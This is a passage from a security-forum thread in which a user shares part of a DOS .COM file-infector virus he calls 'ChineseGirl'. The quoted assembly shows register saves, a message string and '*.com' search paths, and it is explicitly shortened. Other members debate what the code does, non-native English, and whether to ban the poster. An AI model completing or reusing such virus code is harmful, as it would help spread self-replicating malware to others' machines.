Page 2 of 2 FirstFirst 12

Thread: nakoka's "ChineseGirl"

Talking Re: nakoka's "ChineseGirl"

Originally posted by nakoka
    THis is My first Virus in my life.She called ChineseGirl.I had Finished it about 2years ago.it just a small Virus. I belive "assemble language + C = nuclear weapon" all the time!

code segment
    assume cs:code,ds:code
    org 0h
    begin :

push ax
    push bx
    push cx
    push dx
    push bp
    push si
    push di
    push ds
    push es

jmp ChineseGirl
    handle dw ?
    jmp db 0e9h
    message db 'ChineseGirl! $'
    len dw ?
    real dw ?
    dss dw ?
    path db '*.com',0
    fpath db '\dos\*.com',0
    dos db '\dos\',13 dup(?)
    no db 'Z'
    hh dd 11112222h
    tc db 2eh
    tc1 dw 2effh
    tc2 dw 004ah
    dta db 45 dup(?)

Shorten for obvious reasons...........

You forgot to int24 the HDD, otherwise it will just write to a non-existant sector. Other than displaying a message on the screen, it didn't seem to do much of anything else? How is it a virus? I think my 386 didn't support some of the instructions set either, so that might be the problem.

Smile

I think Nakoka means well.
    Perhaps because his English isn't that good he might have trouble expressing himself.
    And please call hehbris by his real name, it's Debris. And yes he is now again amongst us. But I am sure most of you are keeping an eye on suspicious postings.

Arrow

Hey Nakoka! Which language DO you speak as a first language?

I find Nakoka's code interesting as well....I enjoy analyzing it even if i don't completely understand it yet.

It's security related...I think he should stay...there are other members who would eat this up and make a patch for it...we could learn something from his code.

Senior since the 3 dot era

Re: Firefemme

The *anglo-american* people have a major advantage in the forums -> the others have to speak their language.

so Nakoka don't let language probs keep you AFK
    I will try your code on an old box to see what it does, when I have time for it.

i never said...

For the record, i never said anything about banning him! I am also not one of those bashing someone about not speaking english as a first language. Those that do not embrace diversity will be trampled to death by it... end of story.

Unhappy Re: Doh!

Originally posted by cheez_cake
    Would someone please take the garbage out???? It would be greatly appreciated if *cough*nakoka*cough* was removed or silenced. <snip>
    For the record, i never said anything about banning him!
    Really?

You had me fooled.
    remove / silence isn't akin to banning then... hmm, as an English person, I'd better go back 2 school and re-learn my own language cos I've obviously been missing something all these years.

my words did not say to prevent him from visiting, contributing or participating in anyway! Yes, please check your english again... my words were meant in jest of the situation i.e. the odd posts nakoka makes that don't amount to a hill of beans!

Re: Re: Doh!

Originally posted by jcdux

Really?

You had me fooled.
    remove / silence isn't akin to banning then... hmm, as an English person, I'd better go back 2 school and re-learn my own language cos I've obviously been missing something all these years.
    Well, if I remove you from a club.. you can still come back another time..

If I silence you, its simply stopping you from speaking for a short period of time (for instance, closing this stupid thread), unless of course I cut out your tongue.. (remove your ability to post)

But if I ban you from said club, it really means goodbye, your out of here and we don't want you back... (account deleted)

One thing you might be missing about the english language jcdux is that context really matters...

And quite frankly, lets face it.. having your account removed doesn't really keep you off AO..
    -Matty_Cross
    \"Isn\'t sanity just a one trick pony anyway? I mean, all you get is one trick. Rational Thinking.
    But when you\'re good and crazy, hehe, the skies the limit!!\"

Wink thank you matty!

thaks for your view matty... it is all in how you look at things and the context you take it in... along with your mood at the moment